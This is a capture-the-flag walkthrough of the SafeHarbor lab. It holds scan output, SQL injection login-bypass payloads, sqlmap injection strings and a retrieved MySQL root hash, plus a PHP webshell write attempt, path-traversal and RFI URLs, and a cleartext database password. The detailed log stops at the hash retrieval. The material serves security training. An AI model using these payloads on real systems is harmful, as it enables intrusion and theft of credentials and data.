VulnHub SafeHarbor (Advanced)

=======================================================================================================
Walkthrough of the SafeHarbor:1 VulnHub CTF
=======================================================================================================

Step 1. Scanning & Enumeration (Nmap + Nikto + SearchSploit)
	 + SSH server (22/tcp)
	 + OnlineBanking Website (80/tcp)

Step 2. Gaining access

     	1. Find and exploit a SQL injection flaw in the login page (login.php) that allows to bypass the authentication (manual exploit or SQLmap)
     	   => you can log into the website as admin, bill, etc..
     	   
     	2. Find and exploit a SQL injection flaw in the transfer page (/OnlineBanking/index.php?p=transfer) using SQLmap
     	   => The SQL injection allows to perform SQL queries as root (DBA) on the MySQL database supporting the Webiste
     	   => Recover the clear-text password of all the Website users and the password hahs of the MySQL root user
     	   
     	3. Review the content (php settings) of the page "/phpinfo.php" (identified with dirbuster)
     	   => allow_url_fopen   : On  => potential RFI
     	   => allow_url_include : On  => potential RFI	
     	   => open_basedir : no value => potential LFI
  
     	4. Find a Local File Include (LFI) issue ... however it is not exploitable
     	    => http://192.168.1.36/OnlineBanking/index.php?p=/../../../../../../../var/www/html/OnlineBanking/welcome
     	    
     	5. Run the tool KADMIUS to check for common LFI flaws and find a source code disclosure ("/OnlineBanking/index.php?p=php://filter/convert.base64-encode/resource=transfer")
     	   => Recover the clear-text password of the MySQL root user in the source code of several pages
     	      $dbServer = mysqli_connect('mysql','root','TestPass123!', 'HarborBankUsers')
     	  
     	6. Find and exploit a Remote File Include (RFI) flaw (http://192.168.1.24/OnlineBanking/index.php?p=http://192.168.1.22:8000/about)
     	   => Gain a remote shell running as "www-data" on the Docker hosting the OnlineBanking Website
     	   => no privesc identified
     	    
     	7. Upload a Meterpreter shell and use it to set up a pivot and attack the other docker images available on the 'docker' network 
     	   => Identify several Docker containers with services open (MySQL, Kibana, ElasticSearch)
     	   => I loggged into the MySQL database with the root password previosuly found and tried without success to privesc to gain a shell on the 'MySQL' docker 
     	   
     	8. Find and exploit a RCE vulnerabilty (CVE-2015-1427 - ElasticSearch Search Groovy Sandbox Bypass) using a plugin of Metasploit
     	   => Gain a remote shell (meterpreter) running as "ROOT" on the Docker container hosting the ElasticSearch
     	   
     	9. Review the configuration of the docker image (look for privesc flaws + information gathering)
     	   => Find out that the Docker Remote API is accessible on the local IP adress 127.0.0.1:2375  

Step 3. Privilege escalation to become Root on the host (Linux server Shafeharbour)

    	1. Create a local port forward rule with the metererper shell to be able to access easily the the Docker Remote API
    	
    	2. Perform a privilege escalation attack using the docker client and the exposed docker socket (i.e. run a new container with a volume pointing to the root folder of the hosting Linux server)
    	   => Gain root access to the underlying Linux server 'safeharbor' and to the all docker containers

	3. Change the password of the user 'absozed' to be able to easily log into the Linux server 'safeharbor' and run the tool 'Docker Bench for Security' that checks 
           for dozens of common best-practices around deploying Docker containers in production (https://github.com/docker/docker-bench-security)
    	   => the docker configuration has not been hardened ;-)


=======================================================================================================
Step 1. Scanning & Enumeration (Nmap + Nikto + WPscan)
=======================================================================================================

jeff@kali:~$ sudo netdiscover
Currently scanning: 192.168.117.0/16   |   Screen View: Unique Hosts
                                                                                                                                                                                                        
 6 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 360
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.3     14:0c:76:53:4d:4e      1      60  FREEBOX SAS
 192.168.1.24    08:00:27:47:13:74      1      60  PCS Systemtechnik GmbH
 192.168.1.29    f4:5c:89:c9:be:c5      1      60  Apple, Inc.
 192.168.1.35    d4:25:8b:d6:cd:e2      1      60  Intel Corporate
 192.168.1.254   68:a3:78:8b:0c:dd      1      60  FREEBOX SAS
 192.168.27.1    14:0c:76:53:4d:4e      1      60  FREEBOX SAS

-------------------------------------------------------------------------------------------------------

jeff@kali:~$ sudo nmap -sS -sV -sC -p- -v 192.168.1.24

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 16:03 CEST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:03
Completed NSE at 16:03, 0.00s elapsed
Initiating NSE at 16:03
Completed NSE at 16:03, 0.00s elapsed
Initiating NSE at 16:03
Completed NSE at 16:03, 0.00s elapsed
Initiating ARP Ping Scan at 16:03
Scanning 192.168.1.24 [1 port]
Completed ARP Ping Scan at 16:03, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:03
Completed Parallel DNS resolution of 1 host. at 16:03, 0.11s elapsed
Initiating SYN Stealth Scan at 16:03
Scanning 192.168.1.24 [65535 ports]
Discovered open port 80/tcp on 192.168.1.24
Discovered open port 22/tcp on 192.168.1.24
Completed SYN Stealth Scan at 16:03, 3.67s elapsed (65535 total ports)
Initiating Service scan at 16:03
Scanning 2 services on 192.168.1.24
Completed Service scan at 16:03, 6.14s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.24.
Initiating NSE at 16:03
Completed NSE at 16:03, 0.69s elapsed
Initiating NSE at 16:03
Completed NSE at 16:03, 0.01s elapsed
Initiating NSE at 16:03
Completed NSE at 16:03, 0.00s elapsed
Nmap scan report for 192.168.1.24
Host is up (0.00012s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fc:c6:49:ce:9b:54:7f:57:6d:56:b3:0a:30:47:83:b4 (RSA)
|   256 73:86:8d:97:2e:60:08:8a:76:24:3c:94:72:8f:70:f7 (ECDSA)
|_  256 26:48:91:66:85:a2:39:99:f5:9b:62:da:f9:87:4a:e6 (ED25519)
80/tcp   open     http    nginx 1.17.4
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.17.4
|_http-title: Login
2375/tcp filtered docker
MAC Address: 08:00:27:47:13:74 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 16:03
Completed NSE at 16:03, 0.00s elapsed
Initiating NSE at 16:03
Completed NSE at 16:03, 0.00s elapsed
Initiating NSE at 16:03
Completed NSE at 16:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap

-------------------------------------------------------------------------------------------------------

jeff@kali:~$ nikto -h http://192.168.1.24
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.24
+ Target Hostname:    192.168.1.24
+ Target Port:        80
+ Start Time:         2020-04-16 16:16:33 (GMT2)
---------------------------------------------------------------------------
+ Server: nginx/1.17.4
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.2.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2020-04-16 16:17:27 (GMT2) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

-------------------------------------------------------------------------------------------------------

jeff@kali:~$ dirb  http://192.168.1.24

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Apr 16 16:17:54 2020
URL_BASE: http://192.168.1.24/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------
GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.24/ ----
+ http://192.168.1.24/phpinfo.php (CODE:200|SIZE:86210)-----------------
END_TIME: Thu Apr 16 16:18:05 2020
DOWNLOADED: 4612 - FOUND: 1

-------------------------------------------------------------------------------------------------------

jeff@kali:~$ searchsploit openssh
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Exploit Title                                                                                                                                                  |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Debian OpenSSH - (Authenticated) Remote SELinux Privilege Escalation                                                                                            | exploits/linux/remote/6094.txt
Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIENTS' Denial of Service                                                                                              | exploits/multiple/dos/1572.pl
FreeBSD OpenSSH 3.5p1 - Remote Command Execution                                                                                                                | exploits/freebsd/remote/17462.txt
Novell Netware 6.5 - OpenSSH Remote Stack Overflow                                                                                                              | exploits/novell/dos/14866.txt
OpenSSH 1.2 - '.scp' File Create/Overwrite                                                                                                                      | exploits/linux/remote/20253.sh
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                                                                        | exploits/linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                                                                  | exploits/linux/remote/45210.py
OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-by-One                                                                                                               | exploits/unix/remote/21314.txt
OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token Buffer Overflow                                                                                                      | exploits/linux/remote/21402.txt
OpenSSH 3.x - Challenge-Response Buffer Overflow (1)                                                                                                            | exploits/unix/remote/21578.txt
OpenSSH 3.x - Challenge-Response Buffer Overflow (2)                                                                                                            | exploits/unix/remote/21579.txt
OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service                                                                                                      | exploits/multiple/dos/2444.sh
OpenSSH 6.8 < 6.9 - 'PTY' Local Privilege Escalation                                                                                                            | exploits/linux/local/41173.c
OpenSSH 7.2 - Denial of Service                                                                                                                                 | exploits/linux/dos/40888.py
OpenSSH 7.2p1 - (Authenticated) xauth Command Injection                                                                                                         | exploits/multiple/remote/39569.py
OpenSSH 7.2p2 - Username Enumeration                                                                                                                            | exploits/linux/remote/40136.py
OpenSSH < 6.6 SFTP (x64) - Command Execution                                                                                                                    | exploits/linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                                                                                                                          | exploits/linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation                                                            | exploits/linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                                                                                        | exploits/linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                                                                            | exploits/linux/remote/45939.py
OpenSSH SCP Client - Write Arbitrary Files                                                                                                                      | exploits/multiple/remote/46516.py
OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident                                                                                                             | exploits/linux/remote/26.sh
OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool                                                                                                               | exploits/linux/remote/25.c
OpenSSHd 7.2p2 - Username Enumeration                                                                                                                           | exploits/linux/remote/40113.txt
Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack                                                                                                            | exploits/multiple/remote/3303.sh
glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - File Read                                                                                                          | exploits/linux/local/258.sh
---------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

=======================================================================================================

jeff@kali:~/Documents/CTFs/SafeHarbor$ searchsploit nginx
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Exploit Title                                                                                                                                                  |  Path| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Nginx (Debian Based Distros + Gentoo) - 'logrotate' Local Privilege Escalation                                                                                  | exploits/linux/local/40768.sh
Nginx 0.6.36 - Directory Traversal                                                                                                                              | exploits/multiple/remote/12804.txt
Nginx 0.6.38 - Heap Corruption                                                                                                                                  | exploits/linux/local/14830.py
Nginx 0.6.x - Arbitrary Code Execution NullByte Injection                                                                                                       | exploits/multiple/webapps/24967.txt
Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - Denial of Service (PoC)                                                               | exploits/linux/dos/9901.txt
Nginx 0.7.61 - WebDAV Directory Traversal                                                                                                                       | exploits/multiple/remote/9829.txt
Nginx 0.7.64 - Terminal Escape Sequence in Logs Command Injection                                                                                               | exploits/multiple/remote/33490.txt
Nginx 0.7.65/0.8.39 (dev) - Source Disclosure / Download                                                                                                        | exploits/windows/remote/13822.txt
Nginx 0.8.36 - Source Disclosure / Denial of Service                                                                                                            | exploits/windows/remote/13818.txt
Nginx 1.1.17 - URI Processing SecURIty Bypass                                                                                                                   | exploits/multiple/remote/38846.txt
Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)                                                                                      | exploits/linux/remote/25775.rb
Nginx 1.3.9 < 1.4.0 - Denial of Service (PoC)                                                                                                                   | exploits/linux/dos/25499.py
Nginx 1.3.9/1.4.0 (x86) - Brute Force                                                                                                                           | exploits/linux_x86/remote/26737.pl
Nginx 1.4.0 (Generic Linux x64) - Remote Overflow                                                                                                               | exploits/linux_x86-64/remote/32277.txt
PHP-FPM + Nginx - Remote Code Execution                                                                                                                         | exploits/php/webapps/47553.md
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Shellcodes: No Result


=======================================================================================================
Step 2. Gaining access
=======================================================================================================

1. Detect and exploit an SQL injection flaw in the login page (login.php) that allows to bypass the authentication (manual exploit or SQLmap)
=> you can log into the website as admin, bill, etc..
     	   


jeff@kali:~/Documents/CTFs/SafeHarbor$ cat SQLi-Login-request-burp 

	POST http://192.168.1.24/login.php HTTP/1.1
	Host: 192.168.1.24
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://192.168.1.24/login.php
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 33
	Connection: close
	Cookie: PHPSESSID=5b650f738644be53c80d09a72ae96bba
	Upgrade-Insecure-Requests: 1

	user=admin*&password=admin*&s=Login

jeff@kali:~/Documents/CTFs/SafeHarbor$ 

------------------------------------------------------------------------------------------

jeff@kali:~$ sqlmap -f --users --passwords --privileges --dbms="MySQL" -r /home/jeff/Documents/CTFs/SafeHarbor/SQLi-Login-request-burp 
        ___
       __H__                                                                                                                                                                                             
 ___ ___["]_____ ___ ___  {1.4.3#stable}                                                                                                                                                                 
|_ -| . [(]     | .'| . |                                                                                                                                                                                
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                
      |_|V...       |_|   http://sqlmap.org                                                                                                                                                              

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:05:29 /2020-04-16/

[17:05:29] [INFO] parsing HTTP request from '/home/jeff/Documents/CTFs/SafeHarbor/SQLi-Login-request-burp'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[17:05:33] [INFO] testing connection to the target URL
[17:05:33] [INFO] testing if the target URL content is stable
[17:05:33] [INFO] target URL content is stable
[17:05:33] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[17:05:33] [WARNING] (custom) POST parameter '#1*' does not appear to be dynamic

[17:05:33] [INFO] heuristic (basic) test shows that (custom) POST parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[17:05:33] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[17:05:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:05:37] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:05:37] [INFO] testing 'Generic inline queries'

[17:05:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
got a 302 redirect to 'http://192.168.1.24:80/OnlineBanking/index.php?p=welcome'. Do you want to follow? [Y/n] n

[17:06:01] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:06:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[17:06:05] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[17:06:09] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
<SNIP>
[17:08:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[17:08:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[17:08:13] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[17:08:14] [WARNING] (custom) POST parameter '#1*' does not seem to be injectable

[17:08:14] [WARNING] (custom) POST parameter '#2*' does not appear to be dynamic
[17:08:14] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#2*' might not be injectable
<SNIP>

---------------------------------------------------------------------------------------------

Examples of SQLi payloads to add in the field 'login' of the page 'login.php' to bypass the authentication and log into the Website
-----------------------------------------------------------------------------------------------------------------------------------
admin' AND 4584=4584#
bill' AND 34=34#
bill' AND @@version<6#
bill' AND @@version>5#


=> http://192.168.1.24:80/OnlineBanking/index.php?p=welcome


-------------------------------------------------------------------------------------------

2. Detect and exploit an SQL injection flaw in the transfer page (/OnlineBanking/index.php?p=transfer) using SQLmap
=> The SQL injection allows to perform SQL queries as root (DBA) on the MySQL database supporting the Webiste
=> Recover the clear-text password of all the Website users and the password hahs of the MySQL root user


SQLi in the parameter 'recipient' of the page 'OnlineBanking/index.php?p=transfer' detected manually and then exploited using SQLmap
-------------------------------------------------------------------------------------------------------------------------------------

jeff@kali:~/Documents/CTFs/SafeHarbor$ cat SQLi-Transfer-request-burp 

    POST http://192.168.1.24/OnlineBanking/index.php?p=transfer HTTP/1.1
    Host: 192.168.1.24
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.1.24/OnlineBanking/index.php?p=transfer
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 41
    Connection: close
    Cookie: PHPSESSID=f44c0c786d08026dccf04cbc22b8f94d
    Upgrade-Insecure-Requests: 1
    
    recipient=admin*&amount=0.00001&x=Submit

--------------------------------------------------

jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo sqlmap --is-dba --current-user --current-db --dbms="MySQL" --level=3 --risk=3 -r SQLi-Transfer-request-burp 
        ___
       __H__                                                                                                                                                                                             
 ___ ___[.]_____ ___ ___  {1.4.3#stable}                                                                                                                                                                 
|_ -| . [']     | .'| . |                                                                                                                                                                                
|___|_  [.]_|_|_|__,|  _|                                                                                                                                                                                
      |_|V...       |_|   http://sqlmap.org                                                                                                                                                              

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:01:55 /2020-04-16/

[21:01:55] [INFO] parsing HTTP request from 'SQLi-Transfer-request-burp'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[21:01:59] [INFO] testing connection to the target URL
[21:01:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[21:01:59] [INFO] testing if the target URL content is stable
[21:01:59] [INFO] target URL content is stable
[21:01:59] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[21:01:59] [WARNING] (custom) POST parameter '#1*' does not appear to be dynamic
[21:01:59] [INFO] heuristic (basic) test shows that (custom) POST parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[21:01:59] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] Y
<SNIP>
[21:02:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[21:02:08] [INFO] (custom) POST parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --not-string="23")
[21:02:08] [INFO] testing 'Generic inline queries'
[21:02:08] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
<SNIP>
[21:02:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:02:08] [INFO] (custom) POST parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[21:02:08] [INFO] testing 'MySQL inline queries'
[21:02:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[21:02:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
<SNIP>
[21:02:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:02:28] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[21:02:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:02:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:02:28] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:02:28] [INFO] target URL appears to have 1 column in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
[21:02:39] [INFO] target URL appears to be UNION injectable with 1 columns
[21:02:39] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
<SNIP>
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 477 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: recipient=admin' AND 7337=(SELECT (CASE WHEN (7337=7337) THEN 7337 ELSE (SELECT 4342 UNION SELECT 5555) END))-- -&amount=0.00001&x=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: recipient=admin' AND (SELECT 8462 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT (ELT(8462=8462,1))),0x716b706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- coRV&amount=0.00001&x=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: recipient=admin' AND (SELECT 4847 FROM (SELECT(SLEEP(5)))kWRe)-- nzMi&amount=0.00001&x=Submit
---
[21:02:48] [INFO] the back-end DBMS is MySQL
[21:02:48] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[21:02:48] [INFO] fetching current user
[21:02:48] [INFO] retrieved: 'root@%'
current user: 'root@%'
[21:02:48] [INFO] fetching current database
[21:02:48] [INFO] retrieved: 'HarborBankUsers'
current database: 'HarborBankUsers'
[21:02:48] [INFO] testing if current user is DBA
[21:02:48] [INFO] fetching current user
current user is DBA: True
[21:02:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.24'

[*] ending @ 21:02:48 /2020-04-16/

jeff@kali:~/Documents/CTFs/SafeHarbor$ 

---------------------------------------------------

jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo sqlmap --sql-shell --dbms="MySQL" -r SQLi-Transfer-request-burp 
        ___
       __H__                                                                                                                                                            
 ___ ___[)]_____ ___ ___  {1.4.3#stable}                                                                                                                                
|_ -| . [)]     | .'| . |                                                                                                                                               
|___|_  [,]_|_|_|__,|  _|                                                                                                                                               
      |_|V...       |_|   http://sqlmap.org                                                                                                                             

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:19:29 /2020-04-16/

[21:19:29] [INFO] parsing HTTP request from 'SQLi-Transfer-request-burp'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[21:19:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: recipient=admin' AND 7337=(SELECT (CASE WHEN (7337=7337) THEN 7337 ELSE (SELECT 4342 UNION SELECT 5555) END))-- -&amount=0.00001&x=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: recipient=admin' AND (SELECT 8462 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT (ELT(8462=8462,1))),0x716b706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- coRV&amount=0.00001&x=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: recipient=admin' AND (SELECT 4847 FROM (SELECT(SLEEP(5)))kWRe)-- nzMi&amount=0.00001&x=Submit
---
[21:19:31] [INFO] testing MySQL
[21:19:31] [INFO] confirming MySQL
[21:19:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[21:19:31] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/html/webshell.php
[21:21:22] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
sql-shell> SELECT LOAD_FILE('/etc/passwd');
[21:23:36] [INFO] fetching SQL SELECT statement query output: 'SELECT LOAD_FILE('/etc/passwd')'
[21:23:36] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[21:23:36] [INFO] retrieved: ' '
SELECT LOAD_FILE('/etc/passwd'): ' '
sql-shell> select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/html/webshell.php"
[21:23:55] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
sql-shell> SELECT user,password,host from MYSQL.USER;
[21:26:08] [INFO] fetching SQL SELECT statement query output: 'SELECT user,password,host from MYSQL.USER'
[21:26:08] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[21:26:08] [WARNING] the SQL query provided does not return any output
[21:26:08] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[21:26:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:26:08] [INFO] retrieved: 
[21:26:08] [WARNING] the SQL query provided does not return any output
[21:26:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
sql-shell> exit
[21:26:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.24'




jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo sqlmap --database --users --passwords --dbms="MySQL" -r SQLi-Transfer-request-burp 
        ___
       __H__                                                                                                                                                            
 ___ ___[']_____ ___ ___  {1.4.3#stable}                                                                                                                                
|_ -| . [,]     | .'| . |                                                                                                                                               
|___|_  ["]_|_|_|__,|  _|                                                                                                                                               
      |_|V...       |_|   http://sqlmap.org                                                                                                                             

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:28:03 /2020-04-16/

[21:28:03] [INFO] parsing HTTP request from 'SQLi-Transfer-request-burp'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[21:28:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: recipient=admin' AND 7337=(SELECT (CASE WHEN (7337=7337) THEN 7337 ELSE (SELECT 4342 UNION SELECT 5555) END))-- -&amount=0.00001&x=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: recipient=admin' AND (SELECT 8462 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT (ELT(8462=8462,1))),0x716b706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- coRV&amount=0.00001&x=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: recipient=admin' AND (SELECT 4847 FROM (SELECT(SLEEP(5)))kWRe)-- nzMi&amount=0.00001&x=Submit
---
[21:28:06] [INFO] testing MySQL
[21:28:06] [INFO] confirming MySQL
[21:28:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[21:28:06] [INFO] fetching database users password hashes
[21:28:06] [INFO] retrieved: 'root'
[21:28:06] [INFO] retrieved: ''
[21:28:06] [INFO] retrieved: 'root'
[21:28:06] [INFO] retrieved: ''
[21:28:06] [INFO] resumed: 'root'
[21:28:06] [INFO] retrieved: '*F20B31125A91203904A57F21129CD8972CDE7FD3'
